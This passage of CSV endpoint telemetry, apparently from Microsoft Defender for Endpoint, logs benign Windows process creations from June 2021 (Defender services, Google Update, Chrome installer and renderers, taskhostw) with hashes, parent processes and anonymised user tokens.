+1497,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:22:58.632811900+00:00,17980,SenseCncProxy.exe,4864,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:22:58.965364300+00:00,2021-06-24 01:23:33.482649500+00:00,b94651f4-6f33-4bd4-b949-0088a45b8169,computerpii_0a470890c60768167990033d701e7bd881398861,170682,False,10.7740.19041.1052,False,11540474045137006,,11540474045175613,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1498,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:01:21.759433400+00:00,1436,GoogleUpdateOnDemand.exe,"""GoogleUpdateOnDemand.exe"" -Embedding",PortableExecutable,2021-04-21 05:19:28.779004+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleUpdateOnDemand.exe,100192,3b91e89e7627f3d19bd2e2257d7edfc2,a2753c7f8e4169722c118eaffe0620c7bb4ef486a60e9b8c3fb98ae4697fc132,badd305be8f003c28f9ffcc18c175876ec76aa33,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:21.870207100+00:00,2021-06-24 10:01:48.566302200+00:00,ee841244-078a-44d1-813d-19fb8e198dbb,computerpii_0a470890c60768167990033d701e7bd881398861,178800,False,10.7740.19041.1052,False,11540474045136908,,11540474045177761,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Google LLC,Google Update,1.3.36.81,Google Update,goopdate.dll,Google Update
+1499,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:01:21.811885300+00:00,4936,GoogleUpdate.exe,"""GoogleUpdate.exe"" /ondemand ",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,3b91e89e7627f3d19bd2e2257d7edfc2,a2753c7f8e4169722c118eaffe0620c7bb4ef486a60e9b8c3fb98ae4697fc132,badd305be8f003c28f9ffcc18c175876ec76aa33,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:01:21.759433400+00:00,1436,GoogleUpdateOnDemand.exe,"""GoogleUpdateOnDemand.exe"" -Embedding",False,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:21.870682900+00:00,2021-06-24 10:01:48.566385300+00:00,045218ba-5f84-40b9-9d96-785259e7ab83,computerpii_0a470890c60768167990033d701e7bd881398861,178801,False,10.7740.19041.1052,False,11540474045177761,,11540474045177762,2021-06-24 10:01:21.759433400+00:00,1436,2021-06-24 10:01:21.759433400+00:00,GoogleUpdateOnDemand.exe,1436,256,TerminateProcessStartkey,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd,100192,2021-04-13 02:35:50+00:00,2021-04-21 05:19:24.583809+00:00,2021-06-24 10:01:21.762929100+00:00,2021-04-21 05:19:28.779004+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.81,Google Update,goopdate.dll,Google Update,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+1500,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:01:21.922056400+00:00,6672,GoogleUpdate.exe,"""GoogleUpdate.exe"" /medsvc",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:22.110244+00:00,2021-06-24 10:01:48.567114100+00:00,19b54562-7e02-4b1d-bf08-5c2072345ec5,computerpii_0a470890c60768167990033d701e7bd881398861,178809,False,10.7740.19041.1052,False,11540474045136906,,11540474045177763,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+1501,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:01:22.064056900+00:00,20156,setup.exe,"""setup.exe"" --rename-chrome-exe --system-level --verbose-logging --channel",PortableExecutable,2021-06-24 00:53:17.529202100+00:00,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,2727592,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:01:21.922056400+00:00,6672,GoogleUpdate.exe,"""GoogleUpdate.exe"" /medsvc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:22.112128400+00:00,2021-06-24 10:01:48.567211600+00:00,4226246c-6728-46e9-ac32-2cef0d3a3589,computerpii_0a470890c60768167990033d701e7bd881398861,178810,False,10.7740.19041.1052,False,11540474045177763,,11540474045177764,2021-06-24 10:01:21.922056400+00:00,6672,2021-06-24 10:01:21.922056400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,6672,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-24 00:52:58.956026600+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer
+1502,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:01:22.118782400+00:00,18056,setup.exe,"""setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=91.0.4472.114 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff796aaef20,0x7ff796aaef30,0x7ff796aaef40",PortableExecutable,2021-06-24 00:53:17.529202100+00:00,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,2727592,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:01:22.064056900+00:00,20156,setup.exe,"""setup.exe"" --rename-chrome-exe --system-level --verbose-logging --channel",True,2021-06-24 10:01:21.922056400+00:00,6672,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:22.165151+00:00,2021-06-24 10:01:48.568501100+00:00,829aec3c-eb24-41e4-bb03-a007b7307bf2,computerpii_0a470890c60768167990033d701e7bd881398861,178825,False,10.7740.19041.1052,False,11540474045177764,,11540474045177765,2021-06-24 10:01:22.064056900+00:00,20156,2021-06-24 10:01:22.064056900+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,20156,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer,2727592,2021-06-17 00:09:08+00:00,2021-06-24 00:53:01.601809800+00:00,2021-06-24 10:01:22.098386400+00:00,2021-06-24 00:53:17.529202100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,256.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer
+1503,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:01:22.151661100+00:00,5696,setup.exe,"""setup.exe"" --channel --delete-old-versions --system-level --verbose-logging",PortableExecutable,2021-06-24 00:53:17.529202100+00:00,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,2727592,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:01:22.064056900+00:00,20156,setup.exe,"""setup.exe"" --rename-chrome-exe --system-level --verbose-logging --channel",True,2021-06-24 10:01:21.922056400+00:00,6672,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:22.176187400+00:00,2021-06-24 10:01:48.568667800+00:00,e461383f-ce75-407a-90ba-a53f5b4d4095,computerpii_0a470890c60768167990033d701e7bd881398861,178827,False,10.7740.19041.1052,False,11540474045177764,,11540474045177766,2021-06-24 10:01:22.064056900+00:00,20156,2021-06-24 10:01:22.064056900+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,20156,128,TerminateProcessStartkey,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer,2727592,2021-06-17 00:09:08+00:00,2021-06-24 00:53:01.601809800+00:00,2021-06-24 10:01:22.098386400+00:00,2021-06-24 00:53:17.529202100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,0.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer
+1504,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:01:22.187187100+00:00,12688,setup.exe,"""setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=91.0.4472.114 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff796aaef20,0x7ff796aaef30,0x7ff796aaef40",PortableExecutable,2021-06-24 00:53:17.529202100+00:00,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,2727592,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:01:22.151661100+00:00,5696,setup.exe,"""setup.exe"" --channel --delete-old-versions --system-level --verbose-logging",True,2021-06-24 10:01:22.064056900+00:00,20156,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:22.397981200+00:00,2021-06-24 10:01:48.569069100+00:00,4c599b15-de78-4073-8fb9-e5fdc76972bf,computerpii_0a470890c60768167990033d701e7bd881398861,178832,False,10.7740.19041.1052,False,11540474045177766,,11540474045177767,2021-06-24 10:01:22.151661100+00:00,5696,2021-06-24 10:01:22.151661100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\91.0.4472.114\Installer\setup.exe,5696,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application\91.0.4472.114\Installer,2727592,2021-06-17 00:09:08+00:00,2021-06-24 00:53:01.601809800+00:00,2021-06-24 10:01:22.098386400+00:00,2021-06-24 00:53:17.529202100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,1.0,,256.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer
+1505,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:48:44.425177100+00:00,16580,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:48:45.138824700+00:00,2021-06-23 02:50:40.733585400+00:00,9c1ae57d-732b-42cd-973f-ceb6141c3501,computerpii_0a470890c60768167990033d701e7bd881398861,159954,False,10.7740.19041.1052,False,11540474045171838,,11540474045172818,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1506,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:49:21.841044200+00:00,17604,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7936 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:49:22.189031800+00:00,2021-06-23 02:50:40.733728200+00:00,a7cd1563-5795-48be-a42a-7737a9eefa51,computerpii_0a470890c60768167990033d701e7bd881398861,159957,False,10.7740.19041.1052,False,11540474045171838,,11540474045172821,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1507,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 09:57:20.463004100+00:00,10712,taskhostw.exe,taskhostw.exe Install $(Arg0),PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:57:21.378609900+00:00,2021-06-24 09:57:46.921499200+00:00,9bac8c31-5d3a-4c9d-ae15-68cb4f3f2e28,computerpii_0a470890c60768167990033d701e7bd881398861,178756,False,10.7740.19041.1052,False,11540474045136925,,11540474045177748,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+1508,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:26:09.981187900+00:00,18028,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey EA1D8BDD-6F9A-A0CB-3C6C-2EDC77D19481 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:26:10.548540500+00:00,2021-06-23 03:26:57.182587400+00:00,13e65502-3beb-4614-9feb-331ec6247c60,computerpii_0a470890c60768167990033d701e7bd881398861,161757,False,10.7740.19041.1052,False,11540474045145394,,11540474045173137,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 